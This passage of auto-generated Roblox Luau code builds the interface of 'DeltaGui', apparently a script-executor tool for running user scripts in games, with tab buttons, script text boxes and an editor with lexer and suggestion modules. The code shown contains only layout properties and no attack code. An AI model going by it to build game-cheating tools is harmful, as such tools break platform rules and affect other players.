StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Frame G2L["29"] = Instance.new("Frame", G2L["26"]); G2L["29"]["BackgroundColor3"] = Color3.fromRGB(72, 72, 72); G2L["29"]["Size"] = UDim2.new(0, 0, 0.9890000224113464, 0); G2L["29"]["BorderColor3"] = Color3.fromRGB(72, 72, 72); G2L["29"]["Position"] = UDim2.new(1, 0, 0.004999999888241291, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Frame.UICorner G2L["2a"] = Instance.new("UICorner", G2L["29"]); G2L["2a"]["CornerRadius"] = UDim.new(0.09000000357627869, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons G2L["2b"] = Instance.new("Folder", G2L["26"]); G2L["2b"]["Name"] = [[Buttons]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home G2L["2c"] = Instance.new("ImageButton", G2L["2b"]); G2L["2c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["2c"]["Image"] = [[rbxassetid://12731028861]]; G2L["2c"]["Size"] = UDim2.new(0.5177212357521057, 0, 0.08347529172897339, 0); G2L["2c"]["Name"] = [[Home]]; G2L["2c"]["Position"] = UDim2.new(0.2218806892633438, 0, 0.29020607471466064, 0); G2L["2c"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home.UIAspectRatioConstraint G2L["2d"] = Instance.new("UIAspectRatioConstraint", G2L["2c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home.OffImage G2L["2e"] = Instance.new("StringValue", G2L["2c"]); G2L["2e"]["Value"] = [[rbxassetid://12731028861]]; G2L["2e"]["Name"] = [[OffImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home.OnImage G2L["2f"] = Instance.new("StringValue", G2L["2c"]); G2L["2f"]["Value"] = [[rbxassetid://12731052548]]; G2L["2f"]["Name"] = [[OnImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home.LocalScript G2L["30"] = Instance.new("LocalScript", G2L["2c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript G2L["31"] = Instance.new("ImageButton", G2L["2b"]); G2L["31"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["31"]["Image"] = [[rbxassetid://12730930487]]; G2L["31"]["Size"] = UDim2.new(0.5177212357521057, 0, 0.08347529172897339, 0); G2L["31"]["Name"] = [[MakeScript]]; G2L["31"]["Position"] = UDim2.new(0.2424367517232895, 0, 0.186909481883049, 0); G2L["31"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript.UIAspectRatioConstraint G2L["32"] = Instance.new("UIAspectRatioConstraint", G2L["31"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript.OffImage G2L["33"] = Instance.new("StringValue", G2L["31"]); G2L["33"]["Value"] = [[rbxassetid://12730888709]]; G2L["33"]["Name"] = [[OffImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript.OnImage G2L["34"] = Instance.new("StringValue", G2L["31"]); G2L["34"]["Value"] = [[rbxassetid://12730930487]]; G2L["34"]["Name"] = [[OnImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript.LocalScript G2L["35"] = Instance.new("LocalScript", G2L["31"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize G2L["36"] = Instance.new("ImageButton", G2L["2b"]); G2L["36"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["36"]["Image"] = [[rbxassetid://12731990314]]; G2L["36"]["Size"] = UDim2.new(0.5177212357521057, 0, 0.08347529172897339, 0); G2L["36"]["Name"] = [[Minimize]]; G2L["36"]["Position"] = UDim2.new(0.2218806892633438, 0, 0.8980652093887329, 0); G2L["36"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize.UIAspectRatioConstraint G2L["37"] = Instance.new("UIAspectRatioConstraint", G2L["36"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize.OffImage G2L["38"] = Instance.new("StringValue", G2L["36"]); G2L["38"]["Value"] = [[rbxassetid://12731990314]]; G2L["38"]["Name"] = [[OffImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize.OnImage G2L["39"] = Instance.new("StringValue", G2L["36"]); G2L["39"]["Value"] = [[rbxassetid://12731990314]]; G2L["39"]["Name"] = [[OnImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize.LocalScript G2L["3a"] = Instance.new("LocalScript", G2L["36"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings G2L["3b"] = Instance.new("ImageButton", G2L["2b"]); G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["3b"]["Image"] = [[rbxassetid://12731105925]]; G2L["3b"]["Size"] = UDim2.new(0.5177212357521057, 0, 0.08347529172897339, 0); G2L["3b"]["Name"] = [[Settings]]; G2L["3b"]["Position"] = UDim2.new(0.2424367517232895, 0, 0.5168625116348267, 0); G2L["3b"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings.UIAspectRatioConstraint G2L["3c"] = Instance.new("UIAspectRatioConstraint", G2L["3b"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings.OffImage G2L["3d"] = Instance.new("StringValue", G2L["3b"]); G2L["3d"]["Value"] = [[rbxassetid://12731105925]]; G2L["3d"]["Name"] = [[OffImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings.OnImage G2L["3e"] = Instance.new("StringValue", G2L["3b"]); G2L["3e"]["Value"] = [[rbxassetid://12731109653]]; G2L["3e"]["Name"] = [[OnImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings.LocalScript G2L["3f"] = Instance.new("LocalScript", G2L["3b"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts G2L["40"] = Instance.new("ImageButton", G2L["2b"]); G2L["40"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["40"]["Image"] = [[rbxassetid://12731084214]]; G2L["40"]["Size"] = UDim2.new(0.5177212357521057, 0, 0.08347529172897339, 0); G2L["40"]["Name"] = [[Scripts]]; G2L["40"]["Position"] = UDim2.new(0.2218806892633438, 0, 0.40612998604774475, 0); G2L["40"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts.UIAspectRatioConstraint G2L["41"] = Instance.new("UIAspectRatioConstraint", G2L["40"]); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts.OffImage G2L["42"] = Instance.new("StringValue", G2L["40"]); G2L["42"]["Value"] = [[rbxassetid://12731084214]]; G2L["42"]["Name"] = [[OffImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts.OnImage G2L["43"] = Instance.new("StringValue", G2L["40"]); G2L["43"]["Value"] = [[rbxassetid://12731089712]]; G2L["43"]["Name"] = [[OnImage]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts.LocalScript G2L["44"] = Instance.new("LocalScript", G2L["40"]); -- StarterGui.DeltaGui.MainUi.MainFrame.UICorner G2L["45"] = Instance.new("UICorner", G2L["25"]); G2L["45"]["CornerRadius"] = UDim.new(0.03999999910593033, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs G2L["46"] = Instance.new("Folder", G2L["25"]); G2L["46"]["Name"] = [[Tabs]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript G2L["47"] = Instance.new("Frame", G2L["46"]); G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["47"]["BackgroundTransparency"] = 1; G2L["47"]["Size"] = UDim2.new(0.8833174705505371, 0, 0.9945666193962097, 0); G2L["47"]["Position"] = UDim2.new(0.11490308493375778, 0, 0.002866186201572418, 0); G2L["47"]["Name"] = [[MakeScript]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.TitleScript G2L["48"] = Instance.new("Frame", G2L["47"]); G2L["48"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["48"]["BackgroundTransparency"] = 0.33329999446868896; G2L["48"]["Size"] = UDim2.new(0.9585282802581787, 0, 0.0768190324306488, 0); G2L["48"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["48"]["Position"] = UDim2.new(0.0236122515052557, 0, 0.019721297547221184, 0); G2L["48"]["Visible"] = false; G2L["48"]["Name"] = [[TitleScript]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.TitleScript.MainTextBox G2L["49"] = Instance.new("TextBox", G2L["48"]); G2L["49"]["PlaceholderColor3"] = Color3.fromRGB(240, 240, 240); G2L["49"]["TextSize"] = 13; G2L["49"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["49"]["BackgroundColor3"] = Color3.fromRGB(16, 16, 16); G2L["49"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["49"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["49"]["BackgroundTransparency"] = 0.800000011920929; G2L["49"]["PlaceholderText"] = [[Enter Your Title...]]; G2L["49"]["Size"] = UDim2.new(0.9665210843086243, 0, 0.8322147727012634, 0); G2L["49"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["49"]["Text"] = [[]]; G2L["49"]["Position"] = UDim2.new(0.016102850437164307, 0, 0.05467604845762253, 0); G2L["49"]["Name"] = [[MainTextBox]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.TitleScript.MainTextBox.UICorner G2L["4a"] = Instance.new("UICorner", G2L["49"]); G2L["4a"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.TitleScript.UICorner G2L["4b"] = Instance.new("UICorner", G2L["48"]); G2L["4b"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox G2L["4c"] = Instance.new("Frame", G2L["47"]); G2L["4c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["4c"]["BackgroundTransparency"] = 0.33329999446868896; G2L["4c"]["Size"] = UDim2.new(0.9585282802581787, 0, 0.8543484807014465, 0); G2L["4c"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["4c"]["Position"] = UDim2.new(0.023612210527062416, 0, 0.1205858588218689, 0); G2L["4c"]["Visible"] = false; G2L["4c"]["Name"] = [[ScriptTextbox]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.UICorner G2L["4d"] = Instance.new("UICorner", G2L["4c"]); G2L["4d"]["CornerRadius"] = UDim.new(0.03999999910593033, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack G2L["4e"] = Instance.new("Frame", G2L["4c"]); G2L["4e"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["4e"]["Size"] = UDim2.new(0.19932666420936584, 0, 0.0753278136253357, 0); G2L["4e"]["Position"] = UDim2.new(0.7811665534973145, 0, 0.8959466814994812, 0); G2L["4e"]["Name"] = [[GoBack]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.TextButton G2L["4f"] = Instance.new("TextButton", G2L["4e"]); G2L["4f"]["TextWrapped"] = true; G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["4f"]["TextSize"] = 12; G2L["4f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["4f"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["4f"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["4f"]["Text"] = [[Go Back]]; G2L["4f"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.TextButton.UICorner G2L["50"] = Instance.new("UICorner", G2L["4f"]); G2L["50"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.TextButton.LocalScript G2L["51"] = Instance.new("LocalScript", G2L["4f"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.UICorner G2L["52"] = Instance.new("UICorner", G2L["4e"]); G2L["52"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.ImageLabel G2L["53"] = Instance.new("ImageLabel", G2L["4e"]); G2L["53"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["53"]["Image"] = [[rbxassetid://12731271008]]; G2L["53"]["Size"] = UDim2.new(0.1843939572572708, 0, 0.5821346640586853, 0); G2L["53"]["BackgroundTransparency"] = 1; G2L["53"]["Position"] = UDim2.new(0.6950233578681946, 0, 0.17911836504936218, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.ImageLabel.UIAspectRatioConstraint G2L["54"] = Instance.new("UIAspectRatioConstraint", G2L["53"]); G2L["54"]["AspectRatio"] = 1.0000001192092896; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript G2L["55"] = Instance.new("Frame", G2L["4c"]); G2L["55"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["55"]["Size"] = UDim2.new(0.25788477063179016, 0, 0.0753278136253357, 0); G2L["55"]["Position"] = UDim2.new(0.48794427514076233, 0, 0.8959466814994812, 0); G2L["55"]["Name"] = [[AddScript]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.TextButton G2L["56"] = Instance.new("TextButton", G2L["55"]); G2L["56"]["TextWrapped"] = true; G2L["56"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["56"]["TextSize"] = 12; G2L["56"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["56"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["56"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["56"]["Text"] = [[Add Script]]; G2L["56"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.TextButton.UICorner G2L["57"] = Instance.new("UICorner", G2L["56"]); G2L["57"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.TextButton.LocalScript G2L["58"] = Instance.new("LocalScript", G2L["56"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.UICorner G2L["59"] = Instance.new("UICorner", G2L["55"]); G2L["59"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.ImageLabel G2L["5a"] = Instance.new("ImageLabel", G2L["55"]); G2L["5a"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["5a"]["Image"] = [[rbxassetid://12731182145]]; G2L["5a"]["Size"] = UDim2.new(0.16445015370845795, 0, 0.6716938018798828, 0); G2L["5a"]["BackgroundTransparency"] = 1; G2L["5a"]["Position"] = UDim2.new(0.7126173377037048, 0, 0.17911836504936218, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.ImageLabel.UIAspectRatioConstraint G2L["5b"] = Instance.new("UIAspectRatioConstraint", G2L["5a"]); G2L["5b"]["AspectRatio"] = 1.0000001192092896; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.MainTextBox G2L["5c"] = Instance.new("TextBox", G2L["4c"]); G2L["5c"]["PlaceholderColor3"] = Color3.fromRGB(236, 236, 236); G2L["5c"]["TextSize"] = 13; G2L["5c"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["5c"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["5c"]["BackgroundColor3"] = Color3.fromRGB(16, 16, 16); G2L["5c"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["5c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["5c"]["MultiLine"] = true; G2L["5c"]["BackgroundTransparency"] = 0.800000011920929; G2L["5c"]["PlaceholderText"] = [[Enter Your Script...]]; G2L["5c"]["Size"] = UDim2.new(0.9474265575408936, 0, 0.834107518196106, 0); G2L["5c"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["5c"]["Text"] = [[]]; G2L["5c"]["Position"] = UDim2.new(0.03306656330823898, 0, 0.031063992530107498, 0); G2L["5c"]["Visible"] = false; G2L["5c"]["Name"] = [[MainTextBox]]; G2L["5c"]["ClearTextOnFocus"] = false; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.MainTextBox.UICorner G2L["5d"] = Instance.new("UICorner", G2L["5c"]); G2L["5d"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar G2L["5e"] = Instance.new("Frame", G2L["4c"]); G2L["5e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["5e"]["BackgroundTransparency"] = 1; G2L["5e"]["Size"] = UDim2.new(0.953382134437561, 0, 0.8380939960479736, 0); G2L["5e"]["Position"] = UDim2.new(0.025999952107667923, 0, 0.02475839853286743, 0); G2L["5e"]["Name"] = [[TextboxBar]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript G2L["5f"] = Instance.new("LocalScript", G2L["5e"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor G2L["60"] = Instance.new("ModuleScript", G2L["5f"]); G2L["60"]["Name"] = [[ScriptEditor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Syntax G2L["61"] = Instance.new("ModuleScript", G2L["60"]); G2L["61"]["Name"] = [[Syntax]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Theme G2L["62"] = Instance.new("ModuleScript", G2L["60"]); G2L["62"]["Name"] = [[Theme]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetLines G2L["63"] = Instance.new("ModuleScript", G2L["60"]); G2L["63"]["Name"] = [[GetLines]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.FakeEditor G2L["64"] = Instance.new("ModuleScript", G2L["60"]); G2L["64"]["Name"] = [[FakeEditor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetLine G2L["65"] = Instance.new("ModuleScript", G2L["60"]); G2L["65"]["Name"] = [[GetLine]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.TweenLibrary G2L["66"] = Instance.new("ModuleScript", G2L["60"]); G2L["66"]["Name"] = [[TweenLibrary]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.GetWord G2L["67"] = Instance.new("ModuleScript", G2L["60"]); G2L["67"]["Name"] = [[GetWord]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Lexer G2L["68"] = Instance.new("ModuleScript", G2L["60"]); G2L["68"]["Name"] = [[Lexer]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Suggestions G2L["69"] = Instance.new("ModuleScript", G2L["60"]); G2L["69"]["Name"] = [[Suggestions]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Words G2L["6a"] = Instance.new("ModuleScript", G2L["60"]); G2L["6a"]["Name"] = [[Words]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.TextFixer G2L["6b"] = Instance.new("ModuleScript", G2L["60"]); G2L["6b"]["Name"] = [[TextFixer]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor G2L["6c"] = Instance.new("ImageLabel", G2L["60"]); G2L["6c"]["BorderSizePixel"] = 0; G2L["6c"]["BackgroundColor3"] = Color3.fromRGB(35, 41, 35); G2L["6c"]["BackgroundTransparency"] = 1; G2L["6c"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["6c"]["BorderColor3"] = Color3.fromRGB(28, 43, 54); G2L["6c"]["Name"] = [[Editor]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll G2L["6d"] = Instance.new("ScrollingFrame", G2L["6c"]); G2L["6d"]["Active"] = true; G2L["6d"]["CanvasSize"] = UDim2.new(0, 0, 0, 0); G2L["6d"]["ElasticBehavior"] = Enum.ElasticBehavior.Always; G2L["6d"]["TopImage"] = [[rbxasset://textures/ui/Scroll/scroll-middle.png]]; G2L["6d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["6d"]["AutomaticCanvasSize"] = Enum.AutomaticSize.XY; G2L["6d"]["BackgroundTransparency"] = 0.9990000128746033; G2L["6d"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["6d"]["ScrollBarImageColor3"] = Color3.fromRGB(64, 64, 64); G2L["6d"]["BorderColor3"] = Color3.fromRGB(53, 53, 53); G2L["6d"]["Name"] = [[Scroll]]; G2L["6d"]["BottomImage"] = [[rbxasset://textures/ui/Scroll/scroll-middle.png]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source G2L["6e"] = Instance.new("TextBox", G2L["6d"]); G2L["6e"]["TextSize"] = 17; G2L["6e"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["6e"]["TextStrokeColor3"] = Color3.fromRGB(41, 41, 41); G2L["6e"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["6e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["6e"]["TextColor3"] = Color3.fromRGB(239, 239, 239); G2L["6e"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["6e"]["MultiLine"] = true; G2L["6e"]["BackgroundTransparency"] = 0.9990000128746033; G2L["6e"]["Size"] = UDim2.new(1, -44, 1, -5); G2L["6e"]["Text"] = [[]]; G2L["6e"]["Position"] = UDim2.new(0, 44, 0, 5); G2L["6e"]["AutomaticSize"] = Enum.AutomaticSize.XY; G2L["6e"]["Name"] = [[Source]]; G2L["6e"]["ClearTextOnFocus"] = false; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.LineHighlight G2L["6f"] = Instance.new("Frame", G2L["6e"]); G2L["6f"]["BorderSizePixel"] = 0; G2L["6f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["6f"]["AnchorPoint"] = Vector2.new(0, 0.5); G2L["6f"]["BackgroundTransparency"] = 0.9399999976158142; G2L["6f"]["Size"] = UDim2.new(1, 0, 0, 17); G2L["6f"]["Position"] = UDim2.new(0, -10, 0, 9); G2L["6f"]["Name"] = [[LineHighlight]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Hidden G2L["70"] = Instance.new("TextLabel", G2L["6e"]); G2L["70"]["BorderSizePixel"] = 0; G2L["70"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["70"]["BackgroundColor3"] = Color3.fromRGB(27, 32, 27); G2L["70"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["70"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["70"]["TextSize"] = 22; G2L["70"]["TextColor3"] = Color3.fromRGB(249, 66, 164); G2L["70"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["70"]["BorderColor3"] = Color3.fromRGB(0, 0, 0); G2L["70"]["Text"] = [[*script hidden*]]; G2L["70"]["Name"] = [[Hidden]]; G2L["70"]["Visible"] = false; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion G2L["71"] = Instance.new("TextButton", G2L["6e"]); G2L["71"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["71"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40); G2L["71"]["TextSize"] = 17; G2L["71"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["71"]["TextColor3"] = Color3.fromRGB(244, 244, 244); G2L["71"]["Visible"] = false; G2L["71"]["Size"] = UDim2.new(0, 130, 0, 26); G2L["71"]["Name"] = [[Suggestion]]; G2L["71"]["BorderColor3"] = Color3.fromRGB(60, 60, 60); G2L["71"]["Text"] = [[keyword]]; G2L["71"]["AutomaticSize"] = Enum.AutomaticSize.X; G2L["71"]["Position"] = UDim2.new(0, 0, -110, 0); G2L["71"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.TextPadding G2L["72"] = Instance.new("UIPadding", G2L["71"]); G2L["72"]["Name"] = [[TextPadding]]; G2L["72"]["PaddingLeft"] = UDim.new(0, 30); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.Icon G2L["73"] = Instance.new("ImageLabel", G2L["71"]); G2L["73"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["73"]["Image"] = [[rbxassetid://413365069]]; G2L["73"]["Size"] = UDim2.new(0, 26, 0, 26); G2L["73"]["Name"] = [[Icon]]; G2L["73"]["BackgroundTransparency"] = 1; G2L["73"]["Position"] = UDim2.new(0, -30, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.Icon.UIAspectRatioConstraint G2L["74"] = Instance.new("UIAspectRatioConstraint", G2L["73"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left G2L["75"] = Instance.new("Frame", G2L["6d"]); G2L["75"]["BorderSizePixel"] = 0; G2L["75"]["BackgroundColor3"] = Color3.fromRGB(45, 45, 45); G2L["75"]["BackgroundTransparency"] = 1; G2L["75"]["Size"] = UDim2.new(0, 27, 1, 0); G2L["75"]["AutomaticSize"] = Enum.AutomaticSize.Y; G2L["75"]["Name"] = [[Left]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Right G2L["76"] = Instance.new("Frame", G2L["75"]); G2L["76"]["BorderSizePixel"] = 0; G2L["76"]["BackgroundColor3"] = Color3.fromRGB(49, 49, 49); G2L["76"]["BackgroundTransparency"] = 1; G2L["76"]["Size"] = UDim2.new(0, 8, 1, 0); G2L["76"]["Position"] = UDim2.new(1, 0, 0, 0); G2L["76"]["AutomaticSize"] = Enum.AutomaticSize.Y; G2L["76"]["Name"] = [[Right]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Right.BottomFade G2L["77"] = Instance.new("UIGradient", G2L["76"]); G2L["77"]["Transparency"] = 